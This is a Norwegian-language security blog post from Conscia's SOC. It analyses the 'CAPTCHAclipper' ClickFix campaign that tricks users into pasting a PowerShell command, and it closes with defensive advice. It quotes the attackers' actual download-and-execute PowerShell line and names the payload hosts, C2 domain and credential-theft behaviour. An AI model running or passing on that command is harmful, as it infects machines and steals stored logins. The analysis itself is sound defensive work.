Conscias SOC-team avdekket et nytt angrep som utnytter CAPTCHA-meldinger. «CAPTCHAclipper»-angrepet blander sosial manipulasjon og teknisk raffinement for å distribuere skadelig programvare. Les analysen vår for å forstå angrepskjeden, IOC-er og konkrete forsvarstiltak.
Conscia Security Operations Center (SOC)-teamet avdekket nylig en omhyggelig utformet angrepskjede utført av en trusselaktør som utnyttet en tilsynelatende ufarlig CAPTCHA-melding.
Dette angrepet, som vi har kalt CAPTCHAclipper, er et eksempel på hvordan sosial manipulasjon og teknisk raffinement brukes for å kompromittere ofrenes systemer og eksfiltrere sensitive data.
Vi observerte de samme TTP-ene i tre forskjellige angrep i løpet av en måned, alle innenfor den europeiske geografiske regionen.
På grunn av angrepskjedens natur mistenker vi at en sofistikert trusselaktør står bak disse angrepene. Vi kan imidlertid ikke gi noen attribusjon i skrivende stund. Hovedkomponenten er sannsynligvis en variant av LummaC2 malware.
Da vi først undersøkte hendelsen, ble de oppgitte IOC-ene ikke flagget som ondsinnede, noe som indikerer bruken av nye TTP-er. Men fra og med publisering av denne artikkelen kan vi allerede se at visse AV-motorer gjenkjenner i det minste noen av IOC-ene, men de kan enkelt endres og gjenbrukes.
Nedenfor diskuterer vi ulike stadier av angrepskjeden.
Analyse av angrepskjeden
Trinn 1: Det ondsinnede CAPTCHA-agnet
Angrepet begynte med et målrettet lokkemiddel: brukere ble henvist til et ondsinnet, men legitimt utseende, nettsted som var vert for en PDF-fil som brukeren kunne laste ned i en phishing-felle. Før nedlasting, blir offeret presentert med interaktiv CAPTCHA.

Dette første trinnet tjente to formål:
- Det etablerte et lag med tillit ved å etterligne legitime verifiseringsmetoder.
- Det initierte den første tekniske utnyttelsen via JavaScript, som vi også gjenkjenner som ‘ClickFix‘ eller ‘paste and run’-teknikk.
Når brukere engasjerte seg med CAPTCHA for å få tilgang til en lovet PDF-fil, ble en ondsinnet JavaScript-kode kjørt stille i bakgrunnen.
Dette skriptet kopierte en PowerShell-kommando til systemets utklippstavle, og forberedte grunnen for neste trinn:
powershell -WindowStyle Hidden -Command “$rQd=‘https://s3-scw-tx.b-cdn[.]net/prizev2[.]txt’; $pLs=New-Object System.Net.WebClient; $sLf=$pLs.DownloadString($rQd); Invoke-Expression $sLf;”

Trinn 2: Sosial manipulasjon med ondsinnede instruksjoner
Etter å ha fullført CAPTCHA, mottok ofrene et varsel om bekreftelsestrinn før de kunne laste ned filen. For å laste den ned, måtte offeret følge instruksjonene som ble gitt, og som var avgjørende for angrepets suksess.
- Trykk Win+R for å åpne dialogboksen Run.
- Trykk CTRL+V for å lime inn utklippstavlekommandoen (uten å være klar over det).
- Trykk på Enter.

Denne tilsynelatende vennligsinnede kommandoen var i virkeligheten en nøye konstruert leveringsmekanisme som:
- Lastet ned et skadelig skript:
prizev2.txt
fra en ekstern server. - Kjørte skriptet helt i minnet, og omgikk filbaserte deteksjoner.
Trinn 3: Distribusjon av ondsinnet nyttelast
Det nedlastede skriptet utførte flere oppgaver for å forberede videre utnyttelse:
- Hentet en ZIP-fil (prize.zip) fra
https://fixedzip.oss-ap-southeast-5.aliyuncs.com
. - Pakket ut ZIP-filinnholdet i en tilfeldig generert mappe i APPDATA-katalogen.
- Lanserte den kjørbare
setup.exe
, og startet angrepets neste fase.

Bruken av APPDATA
-katalogen sikret minimal synlighet for rutinemessige sikkerhetsskanninger, og understreker aktørens fokus på unnvikelse.
Trinn 4: Ondsinnede aktiviteter av Setup.exe
Den kjørbare Setup.exe
var et potent verktøy designet for både umiddelbar effekt og langsiktig utholdenhet. TTP-ene inkluderte:
- Legitimasjonstyveri: Trekke ut påloggingsinformasjon som er lagret i nettleserfiler (påloggingsdata) for forskjellige nettlesere på deres typiske filplassering.
- Rekognosering: Identifisere installert antivirus- og endepunktbeskyttelsesprogramvare for å unngå deteksjon eller deaktivere forsvar.
- Kommando-og-kontroll (C2)-kommunikasjon: Etablering av en utgående tilkobling til
21.4.107:443
, koblet til domenetsliperyedhby.icu
. Denne tilkoblingen la til rette for dataeksfiltrering og tillot ytterligere kommandoer fra angriperen. - Utholdenhetsmekanismer: Registrerer seg selv i
Windows Task Scheduler
for automatisk kjøring etter at systemet har startet på nytt. Opprette en ekstra fil (69HT8K.pif), potensielt som et lokkemiddel eller et sekundært stadium.
Indikatorer for kompromittering (IOC)
Filspor |
|
Filnavn | SHA-256 |
Setup.exe |
|
Autolt3.exe |
|
Nettverksspor |
|
Domener: |
|
IP-adresser: |
|
Implikasjoner og lærdommer
CAPTCHAclipper-angrepet viser en sofistikert, flerlags tilnærming til kompromitterende systemer:
- Brukerinteraksjon som angrepsvektor: Avhengigheten av brukerdrevne handlinger (kopier-lim-kommandoer) eksemplifiserer effektiviteten til sosial manipulasjon.
- Minnebasert kjøring: Kjøring av kode i minnet minimerte deteksjon av tradisjonelle antivirusløsninger.
- Vedvarende tilgang og eksfiltrering: Etablering av vedvarende tilgang sikret langsiktig kontroll, mens C2-kommunikasjon muliggjorde datatyveri og fjernkontroll.
Effektive forsvarsstrategier
CaptchaClipper-angrepet er en påminnelse om at angriperne stadig utvikler nye taktikker. Blandingen av teknisk oppfinnsomhet og psykologisk manipulasjon viser viktigheten av proaktive forsvarsstrategier. Ved å utnytte sosial manipulasjon og flertrinns infeksjonsteknikker, omgår angripere effektivt tradisjonelle forsvar og utnytter brukernes tillit.
For å forsvare seg mot slike sofistikerte trusler anbefaler Conscia SOC at organisasjoner tar i bruk en allsidig tilnærming til cybersikkerhet:
- Opplæring i brukerbevissthet: Gjennomfør regelmessige opplæringsøkter for å hjelpe ansatte med å gjenkjenne phishing og andre sosiale manipulasjonsteknikker.
- Aktiver endepunktgjenkjenning og respons (EDR): Distribuer løsninger som kan identifisere og redusere filløs skadelig programvare og mistenkelig PowerShell-aktivitet.
- Bruk kontinuerlig overvåking av sikkerhetshendelser: Det er ikke nok å distribuere sikkerhetsløsninger hvis du ikke samtidig har analytikere som ser over de potensielle hendelsene. Aktualiteten til deteksjon er avgjørende i denne typen angrep, ettersom det meste av angrepskjeden er automatisert.
- Begrens PowerShell-bruk: Begrens PowerShell-kjøring til bare signerte skript, og overvåk PowerShell-aktivitet nøye.
- Nettverksovervåking og deteksjon av datalekkasje: Implementer nettverksovervåkingsverktøy for å oppdage uvanlige utgående tilkoblinger til C2-servere eller uautorisert dataeksfiltrering.
- Planlegging av hendelsesrespons: Sørg for at teamet ditt er forberedt på å reagere på flertrinnsinfeksjoner med en klar utbedringsstrategi.
I tillegg til det oppfordrer vi også alle cybersikkerhetseksperter til å delta aktivt i fellesskapet med andre cybersikkerhetseksperter. Du kan:
- Samarbeide og dele informasjon: Del innsikt og indikatorer for kompromittering (IOC-er) med pålitelige fellesskap for å bekjempe lignende trusler.
- Rapporter og undersøk: Hvis du oppdager lignende aktivitet, rapporter det til leverandørene av trusseletterretning eller nasjonale cybersikkerhetsorganer for å spore nye trender.
- Forbedre trusseljakt: Utnytt denne analysen som et brukstilfelle for å forbedre trusseljaktfunksjonene i organisasjonen.